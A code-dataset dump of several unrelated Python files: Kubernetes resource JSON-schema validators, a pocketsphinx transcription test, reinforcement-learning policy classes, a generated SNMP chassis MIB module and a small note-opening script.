"readOnly": {"type": "boolean"},
},
},
},
"ports": {
"type": "array",
"items": {
"type": "object",
"required": ["name", "containerPort"],
"properties": {
"name": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": PORT_NAME_PATTERN},
]
},
"containerPort": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 1, "maximum": 65535},
]
},
},
},
},
"command": {"type": "string"},
"args": {"type": "string"},
# Environment variables are kept by the frontend in webCache.env_list and assembled by the backend into env & envFrom
"env": {
"type": "array",
"items": {
"type": "object",
"required": ["name"],
"properties": {
"name": {"type": "string", "minLength": 1},
"value": {"type": "string"},
"valueFrom": {
"type": "object",
"properties": {
"fieldRef": {
"type": "object",
"required": ["fieldPath"],
"properties": {"fieldPath": {"type": "string"}},
},
"configMapKeyRef": {
"type": "object",
"required": ["name", "key"],
"properties": {
"name": {"type": "string", "minLength": 1},
"key": {"type": "string", "minLength": 1},
},
},
"secretKeyRef": {
"type": "object",
"required": ["name", "key"],
"properties": {
"name": {"type": "string", "minLength": 1},
"key": {"type": "string", "minLength": 1},
},
},
},
},
},
},
},
"envFrom": {
"type": "array",
"items": {
"type": "object",
"properties": {
"configMapRef": {
"type": "object",
"properties": {"name": {"type": "string", "minLength": 1}},
},
"secretRef": {"type": "object", "properties": {"name": {"type": "string", "minLength": 1}}},
},
},
},
"resources": {
"type": "object",
"properties": {
"limits": {
"type": "object",
"properties": {
"cpu": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 0},
]
},
"memory": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
},
},
"requests": {
"type": "object",
"properties": {
"cpu": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
"memory": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
},
},
},
},
},
},
}
CONTAINER_SCHEMA = {
"type": "array",
"items": {
"type": "object",
"required": [
"name",
"image",
"imagePullPolicy",
"volumeMounts",
"ports",
"resources",
"livenessProbe",
"readinessProbe",
"lifecycle",
],
"properties": {
"name": {"type": "string", "minLength": 1},
"image": {"type": "string", "minLength": 1},
"imagePullPolicy": {"type": "string", "enum": ["Always", "IfNotPresent", "Never"]},
"volumeMounts": {
"type": "array",
"items": {
"type": "object",
"required": ["name", "mountPath", "readOnly"],
"properties": {
"name": {"type": "string", "pattern": VOLUMR_NAME_PATTERN},
"mountPath": {"type": "string", "pattern": FILE_DIR_PATTERN},
"readOnly": {"type": "boolean"},
},
},
},
"ports": {
"type": "array",
"items": {
"type": "object",
"required": ["name", "containerPort"],
"properties": {
"name": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": PORT_NAME_PATTERN},
]
},
"containerPort": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 1, "maximum": 65535},
]
},
},
},
},
"command": {"type": "string"},
"args": {"type": "string"},
# Environment variables are kept by the frontend in webCache.env_list and assembled by the backend into env & envFrom
"env": {
"type": "array",
"items": {
"type": "object",
"required": ["name"],
"properties": {
"name": {"type": "string", "minLength": 1},
"value": {"type": "string"},
"valueFrom": {
"type": "object",
"properties": {
"fieldRef": {
"type": "object",
"required": ["fieldPath"],
"properties": {"fieldPath": {"type": "string"}},
},
"configMapKeyRef": {
"type": "object",
"required": ["name", "key"],
"properties": {
"name": {"type": "string", "minLength": 1},
"key": {"type": "string", "minLength": 1},
},
},
"secretKeyRef": {
"type": "object",
"required": ["name", "key"],
"properties": {
"name": {"type": "string", "minLength": 1},
"key": {"type": "string", "minLength": 1},
},
},
},
},
},
},
},
"envFrom": {
"type": "array",
"items": {
"type": "object",
"properties": {
"configMapRef": {
"type": "object",
"properties": {"name": {"type": "string", "minLength": 1}},
},
"secretRef": {"type": "object", "properties": {"name": {"type": "string", "minLength": 1}}},
},
},
},
"resources": {
"type": "object",
"properties": {
"limits": {
"type": "object",
"properties": {
"cpu": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 0},
]
},
"memory": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
},
},
"requests": {
"type": "object",
"properties": {
"cpu": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
"memory": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
},
},
},
},
"livenessProbe": K8S_CHECK_SCHEMA,
"readinessProbe": K8S_CHECK_SCHEMA,
"lifecycle": {
"type": "object",
"required": ["preStop", "postStart"],
"properties": {
"preStop": {"type": "object", "required": ["exec"], "properties": {"command": {"type": "string"}}},
"postStart": {
"type": "object",
"required": ["exec"],
"properties": {"command": {"type": "string"}},
},
},
},
},
},
}
K8S_DEPLOYMENT_SCHEMA = {
"type": "object",
"required": ["metadata", "spec"],
"properties": {
"metadata": {
"type": "object",
"required": ["name"],
"properties": {"name": {"type": "string", "pattern": K8S_RES_NAME_PATTERN}},
},
"spec": {
"type": "object",
"required": ["replicas", "strategy", "template"],
"properties": {
"replicas": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
"strategy": {
"type": "object",
"required": ["type"],
"properties": {
"type": {"type": "string", "enum": ["RollingUpdate", "Recreate"]},
"rollingUpdate": {"type": "object", "required": ["maxUnavailable", "maxSurge"]},
},
},
"template": {
"type": "object",
"required": ["metadata", "spec"],
"properties": {
"metadata": {
"type": "object",
"properties": {"lables": {"type": "object"}, "annotations": {"type": "object"}},
},
"spec": {
"type": "object",
"required": [
"restartPolicy",
"terminationGracePeriodSeconds",
"nodeSelector",
"hostNetwork",
"dnsPolicy",
"volumes",
"containers",
],
"properties": {
"restartPolicy": {"type": "string", "enum": ["Always", "OnFailure", "Never"]},
"terminationGracePeriodSeconds": {
"oneOf": [
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 0},
]
},
"nodeSelector": {"type": "object"},
"hostNetwork": {"oneOf": [{"type": "number"}, {"type": "string"}]},
"dnsPolicy": {
"type": "string",
"enum": ["ClusterFirst", "Default", "None", "ClusterFirstWithHostNet"],
},
"volumes": {
"type": "array",
"items": {
"type": "object",
"required": ["name"],
"properties": {
"name": {"type": "string", "pattern": VOLUMR_NAME_PATTERN},
"hostPath": {
"type": "object",
"required": ["path"],
"properties": {
"path": {"type": "string", "pattern": FILE_DIR_PATTERN}
},
},
"emptyDir": {"type": "object"},
"configMap": {
"type": "object",
"required": ["name"],
"properties": {"name": {"type": "string", "minLength": 1}},
},
"secret": {
"type": "object",
"required": ["secretName"],
"properties": {"secretName": {"type": "string", "minLength": 1}},
},
"persistentVolumeClaim": {
"type": "object",
"required": ["claimName"],
"properties": {"claimName": {"type": "string", "minLength": 1}},
},
},
},
},
"containers": CONTAINER_SCHEMA,
"initContainers": INIT_CONTAINER_SCHEMA,
},
},
},
},
},
},
},
}
AFFINITY_SCHEMA = {
"type": "object",
"properties": {
"nodeAffinity": {
"type": "object",
"properties": {
"requiredDuringSchedulingIgnoredDuringExecution": {
"type": "object",
"required": ["nodeSelectorTerms"],
"properties": {
"nodeSelectorTerms": {
"type": "array",
"items": {
"type": "object",
"required": ["matchExpressions"],
"properties": {"matchExpressions": AFFINITY_MATCH_EXPRESSION_SCHEMA},
},
}
},
},
"preferredDuringSchedulingIgnoredDuringExecution": {
"type": "array",
"items": {
"type": "object",
"required": ["preference"],
"properties": {
"weight": {
"oneOf": [
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 1, "maximum": 100},
]
},
"preference": {
"type": "object",
"required": ["matchExpressions"],
"properties": {"matchExpressions": AFFINITY_MATCH_EXPRESSION_SCHEMA},
},
},
},
},
},
"additionalProperties": False,
},
"podAffinity": POD_AFFINITY_SCHEMA,
"podAntiAffinity": POD_AFFINITY_SCHEMA,
},
"additionalProperties": False,
}
# Differences between DaemonSet and Deployment: when the rolling-update strategy is RollingUpdate, only maxUnavailable may be set
# "required": ["replicas", "strategy", "template"],
K8S_DAEMONSET_DIFF = {
"properties": {
"spec": {
"required": ["updateStrategy", "template"],
"properties": {"updateStrategy": {"properties": {"rollingUpdate": {"required": ["maxUnavailable"]}}}},
}
}
}
K8S_DAEMONSET_SCHEMA = update_nested_dict(K8S_DEPLOYMENT_SCHEMA, K8S_DAEMONSET_DIFF)
# Differences between Job and Deployment: Pod runtime settings
# TODO: confirm how replicas and parallelism should be configured for a Job
K8S_JOB_DIFF = {
"properties": {
"spec": {
"type": "object",
"required": ["template", "completions", "parallelism", "backoffLimit", "activeDeadlineSeconds"],
"properties": {
"parallelism": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
"completions": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
"backoffLimit": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
"activeDeadlineSeconds": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
},
}
}
}
K8S_JOB_SCHEMA = update_nested_dict(K8S_DEPLOYMENT_SCHEMA, K8S_JOB_DIFF)
# Differences between StatefulSet and Deployment
K8S_STATEFULSET_DIFF = {
"properties": {
"spec": {
"required": ["template", "updateStrategy", "podManagementPolicy", "volumeClaimTemplates"],
"properties": {
"updateStrategy": {
"type": "object",
"required": ["type"],
"properties": {
"type": {"type": "string", "enum": ["OnDelete", "RollingUpdate"]},
"rollingUpdate": {
"type": "object",
"required": ["partition"],
"properties": {
"partition": {
"oneOf": [
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 0},
]
}
},
},
},
},
"podManagementPolicy": {"type": "string", "enum": ["OrderedReady", "Parallel"]},
"serviceName": {"type": "string", "minLength": 1},
"volumeClaimTemplates": {
"type": "array",
"items": {
"type": "object",
"required": ["metadata", "spec"],
"properties": {
"metadata": {
"type": "object",
"required": ["name"],
"properties": {
# "name": {"type": "string", "minLength": 1}
},
},
"spec": {
"type": "object",
"required": ["accessModes", "storageClassName", "resources"],
"properties": {
# "storageClassName": {"type": "string", "minLength": 1},
"accessModes": {
"type": "array",
"items": {
"type": "string",
"enum": ["ReadWriteOnce", "ReadOnlyMany", "ReadWriteMany"],
},
},
"resources": {
"type": "object",
"required": ["requests"],
"properties": {
"requests": {
"type": "object",
"required": ["storage"],
"properties": {
"storage": {
"oneOf": [
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 0},
]
}
},
}
},
},
},
},
},
},
},
},
}
}
}
K8S_STATEFULSET_SCHEMA = update_nested_dict(K8S_DEPLOYMENT_SCHEMA, K8S_STATEFULSET_DIFF)
K8S_CONFIGMAP_SCHEMA = {
"type": "object",
"required": ["metadata", "data"],
"properties": {
"metadata": {
"type": "object",
"required": ["name"],
"properties": {"name": {"type": "string", "pattern": K8S_RES_NAME_PATTERN}},
},
"data": {
"type": "object",
"patternProperties": {KEY_NAME_PATTERN: {"type": "string"}},
"additionalProperties": False,
},
},
}
K8S_SECRET_SCHEMA = {
"type": "object",
"required": ["metadata", "data"],
"properties": {
"metadata": {
"type": "object",
"required": ["name"],
"properties": {"name": {"type": "string", "pattern": K8S_RES_NAME_PATTERN}},
},
"data": {
"type": "object",
"patternProperties": {KEY_NAME_PATTERN: {"type": "string"}},
"additionalProperties": False,
},
},
}
K8S_SERVICE_SCHEMA = {
"type": "object",
"required": ["metadata", "spec"],
"properties": {
"metadata": {"type": "object", "required": ["name"], "properties": {"name": {"type": "string"}}},
"spec": {
"type": "object",
"required": ["type", "clusterIP", "ports"],
"properties": {
"type": {"type": "string", "enum": ["ClusterIP", "NodePort"]},
"clusterIP": {"type": "string"},
"ports": {
"type": "array",
"items": {
"type": "object",
"required": ["port", "protocol"],
"properties": {
"name": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": PORT_NAME_PATTERN},
]
},
"port": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 1, "maximum": 65535},
]
},
"protocol": {"type": "string", "enum": ["TCP", "UDP"]},
"targetPort": {
"anyof": [
{"type": "number", "minimum": 1, "maximum": 65535},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "string", "minLength": 1},
]
},
"nodePort": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 30000, "maximum": 32767},
]
},
},
},
},
},
},
},
}
K8S_INGRESS_SCHEMA = {"type": "object", "required": ["metadata", "spec"]}
K8S_HPA_SCHEMA = K8S_HPA_SCHNEA = {  # K8S_HPA_SCHNEA is a misspelled alias kept for existing references
"$schema": "http://json-schema.org/draft-04/schema#",
"id": "k8s_hpa",
"type": "object",
"required": ["apiVersion", "kind", "metadata", "spec"],
"properties": {
"apiVersion": {"type": "string", "enum": ["autoscaling/v2beta2"]},
"kind": {"type": "string", "enum": ["HorizontalPodAutoscaler"]},
"metadata": {
"type": "object",
"required": ["name"],
"properties": {"name": {"type": "string", "pattern": K8S_RES_NAME_PATTERN}},
},
"spec": {
"type": "object",
"required": ["scaleTargetRef", "minReplicas", "maxReplicas", "metrics"],
"properties": {
"scaleTargetRef": {
"type": "object",
"required": ["kind", "name"],
"properties": {
"kind": {"type": "string", "enum": ["Deployment"]},
"name": {"type": "string", "pattern": K8S_RES_NAME_PATTERN},
},
},
"minReplicas": {"type": "number", "minimum": 0},
"maxReplicas": {"type": "number", "minimum": 0},
"metrics": {
"type": "array",
"items": {
"type": "object",
"required": ["type", "resource"],
"properties": {
"type": {"type": "string", "enum": ["Resource"]},
"resource": {
"type": "object",
"required": ["name", "target"],
"properties": {
"name": {"type": "string", "enum": ["cpu", "memory"]},
"target": {
"type": "object",
"required": ["type", "averageUtilization"],
"properties": {
"type": {"type": "string", "enum": ["Utilization"]},
"averageUtilization": {"type": "number", "minimum": 0},
},
},
},
},
},
},
},
},
},
},
}
CONFIG_SCHEMA = [
K8S_DEPLOYMENT_SCHEMA,
K8S_DAEMONSET_SCHEMA,
K8S_JOB_SCHEMA,
K8S_STATEFULSET_SCHEMA,
K8S_SERVICE_SCHEMA,
K8S_CONFIGMAP_SCHEMA,
K8S_SECRET_SCHEMA,
K8S_INGRESS_SCHEMA,
K8S_HPA_SCHNEA,
]
CONFIG_SCHEMA_MAP = dict(zip(KRESOURCE_NAMES, CONFIG_SCHEMA))
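The DaemonSet, Job, and StatefulSet schemas are each produced by deep-merging a small `*_DIFF` dict into `K8S_DEPLOYMENT_SCHEMA` via `update_nested_dict`, which is defined elsewhere in this module. A minimal sketch of the recursive merge these diffs assume (nested dicts merge key by key; non-dict values such as the `required` lists replace the base value wholesale):

```python
import copy

def update_nested_dict(base, diff):
    """Return a copy of `base` with `diff` merged in recursively.

    Nested dicts are merged key by key; any non-dict value in `diff`
    (lists such as "required", scalars, etc.) replaces the base value.
    """
    merged = copy.deepcopy(base)
    for key, value in diff.items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = update_nested_dict(merged[key], value)
        else:
            merged[key] = copy.deepcopy(value)
    return merged

deployment = {"properties": {"spec": {"required": ["replicas"], "properties": {"replicas": {}}}}}
diff = {"properties": {"spec": {"required": ["updateStrategy"]}}}
merged = update_nested_dict(deployment, diff)
# "required" is replaced wholesale; the sibling "properties" key survives the merge
```

Note that a `required` list in a diff replaces the whole base list, which is why `K8S_DAEMONSET_DIFF` restates `"template"` alongside `"updateStrategy"`.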
949ade892d25e5435775c907b35e281d3da04296 | 611 | py | Python | src/features/videos/speech/extract_speech.py | ClaasM/VideoArticleRetrieval | MIT
import os
from pocketsphinx import AudioFile
from pocketsphinx import Pocketsphinx
from src import util
test_video = os.environ['DATA_PATH'] + "/other/sphinx_test_video/beachball.mp4"
test_audio = os.environ['DATA_PATH'] + "/other/sphinx_test_audio/interview.wav"
fps = 100  # default
audio_file = AudioFile(audio_file=test_audio, frate=fps)
for phrase in audio_file:  # frate (default=100)
    print(" ".join([s.word for s in phrase.seg()]))
#print(Pocketsphinx().decode(audio_file=test_audio))
# i'm home i'm a i'm won't home all cool i'm wall long and lulu move up at bay back when when i'm i'm home
94a2a12d12ba8f42c8db354ac4d1caf68ea26d8b | 2,705 | py | Python | rpsp/policy/policies.py | ahefnycmu/rpsp | Apache-2.0 | 4 stars
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 28 10:47:38 2016
@author: ahefny
Policies are BLIND to the representation of states, which could be (1) observation,
(2) original latent state or (3) predictive state.
Policies take the "state" dimension x_dim and the number of actions/dim of action as input.
"""
import numpy as np
import scipy.stats
class BasePolicy(object):
    def reset(self):
        pass

    def sample_action(self, state):
        '''
        Samples an action and returns a tuple consisting of:
        chosen action, action probability,
        dictionary of diagnostic information (values must be numbers or vectors)
        '''
        raise NotImplementedError

    def _load(self, params):
        raise NotImplementedError

    def _save(self):
        raise NotImplementedError


class RandomDiscretePolicy(BasePolicy):
    def __init__(self, num_actions, rng=None):
        self.num_actions = num_actions
        self.rng = rng

    def sample_action(self, state):
        action = self.rng.randint(0, self.num_actions)
        return action, 1. / self.num_actions, {}


class RandomGaussianPolicy(BasePolicy):
    def __init__(self, num_actions, rng=None):
        self.num_actions = num_actions
        self.rng = rng

    def sample_action(self, state):
        action = self.rng.randn(self.num_actions)
        return action, np.prod(scipy.stats.norm.pdf(action)), {}


class UniformContinuousPolicy(BasePolicy):
    def __init__(self, low, high, rng=None):
        self._low = low
        self._high = high
        self._prob = 1.0 / np.prod(self._high - self._low)
        self.rng = rng

    def sample_action(self, state):
        dim = len(self._high)
        action = self.rng.rand(dim)
        action = action * (self._high - self._low) + self._low
        return action, self._prob, {}


class LinearPolicy(BasePolicy):
    def __init__(self, K, sigma, rng=None):
        self._K = K
        self._sigma = sigma
        self.rng = rng

    def reset(self):
        pass

    def sample_action(self, state):
        mean = np.dot(self._K, state)
        noise = self.rng.randn(len(mean))
        sigma = self._sigma
        action = mean + noise * sigma
        return action, np.prod(scipy.stats.norm.pdf(noise)), {}


class SineWavePolicy(BasePolicy):
    def __init__(self, amps, periods, phases):
        self._amps = amps
        self._scales = 2 * np.pi / periods
        self._phases = phases * np.pi / 180.0
        self._t = 0

    def reset(self):
        self._t = 0

    def sample_action(self, state):
        a = self._amps * np.sin(self._t * self._scales + self._phases)
        self._t += 1
        return a, 1.0, {}
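All of the policies above share the `BasePolicy` contract: `sample_action(state)` returns an `(action, probability, info)` triple. A stdlib-only toy policy (hypothetical, not part of this module — the real classes draw from a NumPy `rng`) showing the shape of that contract:

```python
import random

class FixedSeedDiscretePolicy:
    """Toy policy mirroring RandomDiscretePolicy's interface using only the stdlib."""

    def __init__(self, num_actions, seed=0):
        self.num_actions = num_actions
        self.rng = random.Random(seed)

    def reset(self):
        pass

    def sample_action(self, state):
        # Uniform over the discrete action set, so each action has prob 1/N
        action = self.rng.randrange(self.num_actions)
        return action, 1.0 / self.num_actions, {}

policy = FixedSeedDiscretePolicy(num_actions=4, seed=42)
action, prob, info = policy.sample_action(state=None)
# action is an int in [0, 4); prob is the uniform probability 0.25
```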
94a2bd43953d6e6e4cffc78fc4b4796273a7d3e4 | 8,002 | py | Python | pysnmp-with-texts/CTRON-CHASSIS-MIB.py | agustinhenze/mibs.snmplabs.com | Apache-2.0 | 8 stars, 4 issues, 10 forks
#
# PySNMP MIB module CTRON-CHASSIS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CTRON-CHASSIS-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:44:24 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint")
ctronChassis, = mibBuilder.importSymbols("CTRON-MIB-NAMES", "ctronChassis")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, TimeTicks, Integer32, Counter32, Counter64, NotificationType, ObjectIdentity, iso, MibIdentifier, ModuleIdentity, Unsigned32, Bits, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "TimeTicks", "Integer32", "Counter32", "Counter64", "NotificationType", "ObjectIdentity", "iso", "MibIdentifier", "ModuleIdentity", "Unsigned32", "Bits", "Gauge32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
ctChas = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 1))
ctEnviron = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2))
ctFanModule = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 3))
ctChasFNB = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("absent", 1), ("present", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasFNB.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasFNB.setDescription('Denotes the presence or absence of the FNB.')
ctChasAlarmEna = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("disable", 1), ("enable", 2), ("notSupported", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ctChasAlarmEna.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasAlarmEna.setDescription('Allow an audible alarm to be either enabled or dis- abled. Setting this object to disable(1) will prevent an audible alarm from being heard and will also stop the sound from a current audible alarm. Setting this object to enable(2) will allow an audible alarm to be heard and will also enable the sound from a current audible alarm, if it has previously been disabled. This object will read with the current setting.')
chassisAlarmState = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("chassisNoFaultCondition", 1), ("chassisFaultCondition", 2), ("notSupported", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chassisAlarmState.setStatus('mandatory')
if mibBuilder.loadTexts: chassisAlarmState.setDescription('Denotes the current condition of the power supply fault detection circuit. This object will read with the value of chassisNoFaultCondition(1) when the chassis is currently operating with no power faults detected. This object will read with the value of chassisFaultCondition(2) when the chassis is currently in a power fault condition.')
ctChasPowerTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1), )
if mibBuilder.loadTexts: ctChasPowerTable.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerTable.setDescription('A list of power supply entries.')
ctChasPowerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1, 1), ).setIndexNames((0, "CTRON-CHASSIS-MIB", "ctChasPowerSupplyNum"))
if mibBuilder.loadTexts: ctChasPowerEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerEntry.setDescription('An entry in the powerTable providing objects for a power supply.')
ctChasPowerSupplyNum = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasPowerSupplyNum.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerSupplyNum.setDescription('Denotes the power supply.')
ctChasPowerSupplyState = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("infoNotAvailable", 1), ("notInstalled", 2), ("installedAndOperating", 3), ("installedAndNotOperating", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasPowerSupplyState.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerSupplyState.setDescription("Denotes the power supply's state.")
ctChasPowerSupplyType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("ac-dc", 1), ("dc-dc", 2), ("notSupported", 3), ("highOutput", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasPowerSupplyType.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerSupplyType.setDescription('Denotes the power supply type.')
ctChasPowerSupplyRedundancy = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("redundant", 1), ("notRedundant", 2), ("notSupported", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasPowerSupplyRedundancy.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerSupplyRedundancy.setDescription('Denotes whether or not the power supply is redundant.')
ctChasFanModuleTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 3, 1), )
if mibBuilder.loadTexts: ctChasFanModuleTable.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasFanModuleTable.setDescription('A list of fan module entries.')
ctChasFanModuleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 3, 1, 1), ).setIndexNames((0, "CTRON-CHASSIS-MIB", "ctChasFanModuleNum"))
if mibBuilder.loadTexts: ctChasFanModuleEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasFanModuleEntry.setDescription('An entry in the fan module Table providing objects for a fan module.')
ctChasFanModuleNum = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 3, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasFanModuleNum.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasFanModuleNum.setDescription('Denotes the Fan module that may have failed.')
ctChasFanModuleState = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("infoNotAvailable", 1), ("notInstalled", 2), ("installedAndOperating", 3), ("installedAndNotOperating", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasFanModuleState.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasFanModuleState.setDescription('Denotes the fan modules state.')
mibBuilder.exportSymbols("CTRON-CHASSIS-MIB", ctEnviron=ctEnviron, ctChasPowerSupplyNum=ctChasPowerSupplyNum, ctChasFanModuleState=ctChasFanModuleState, ctChasPowerEntry=ctChasPowerEntry, ctChasPowerSupplyState=ctChasPowerSupplyState, chassisAlarmState=chassisAlarmState, ctChasPowerSupplyType=ctChasPowerSupplyType, ctChas=ctChas, ctChasFanModuleEntry=ctChasFanModuleEntry, ctChasFanModuleTable=ctChasFanModuleTable, ctChasFNB=ctChasFNB, ctChasPowerTable=ctChasPowerTable, ctChasPowerSupplyRedundancy=ctChasPowerSupplyRedundancy, ctChasAlarmEna=ctChasAlarmEna, ctChasFanModuleNum=ctChasFanModuleNum, ctFanModule=ctFanModule)
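Every object above is registered under a numeric OID tuple beneath the Cabletron enterprise arc (`1.3.6.1.4.1.52`). Converting between the tuple form used by pysnmp and the familiar dotted notation is a one-liner; a small helper (not part of the generated module):

```python
# OID of ctChasFNB exactly as registered above
ct_chas_fnb = (1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 1, 1)

def oid_to_str(oid):
    """Render an OID tuple in dotted notation."""
    return ".".join(str(arc) for arc in oid)

def str_to_oid(s):
    """Parse dotted notation back into a tuple of integer arcs."""
    return tuple(int(arc) for arc in s.split("."))

dotted = oid_to_str(ct_chas_fnb)  # "1.3.6.1.4.1.52.4.3.1.1.1"
```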
94a69109ecb77993367aee324f52626e30882d42 | 307 | py | Python | devtools/write.py | ddrone/language | Apache-2.0 | 2 stars
import os
import sys
from datetime import datetime
from subprocess import run
name = datetime.utcnow().strftime("%Y%m%d-%H%M%S.md")
try:
    # -t stands for "topic"
    topic_index = sys.argv.index('-t')
    path = os.path.join(sys.argv[topic_index + 1], name)
except (ValueError, IndexError):
    path = name
run(['code', path])
